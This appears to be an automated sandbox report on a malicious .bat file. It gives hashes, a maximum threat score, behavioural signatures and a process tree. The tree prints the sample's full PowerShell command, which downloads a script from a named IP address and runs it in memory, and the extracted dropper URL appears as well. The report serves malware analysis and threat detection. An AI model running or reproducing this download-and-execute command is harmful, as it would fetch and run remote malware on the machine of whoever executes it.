Analysis
-
max time kernel
60s -
max time network
61s -
platform
windows7_x64 -
resource
win7 -
submitted
12-07-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
d8b4df362b6cf1bf526634ea889b42de.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
d8b4df362b6cf1bf526634ea889b42de.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
d8b4df362b6cf1bf526634ea889b42de.bat
-
Size
213B
-
MD5
fa5f98db7255446f6688e03c1b8639e1
-
SHA1
9149b6cdcab524d9e06254b52dcdcb0455cdb7ac
-
SHA256
b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca
-
SHA512
e13b67fd455c2e28362529b6cc986135be45d21ad68a8a7b7af6203b4766dce4fe74bd1f8fc16f7de6b09f1b9a787982d4302b2aa26c48c5a6326503b6d3d4a8
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 892 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 892 powershell.exe 892 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 892 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/892-0-0x0000000000000000-mapping.dmp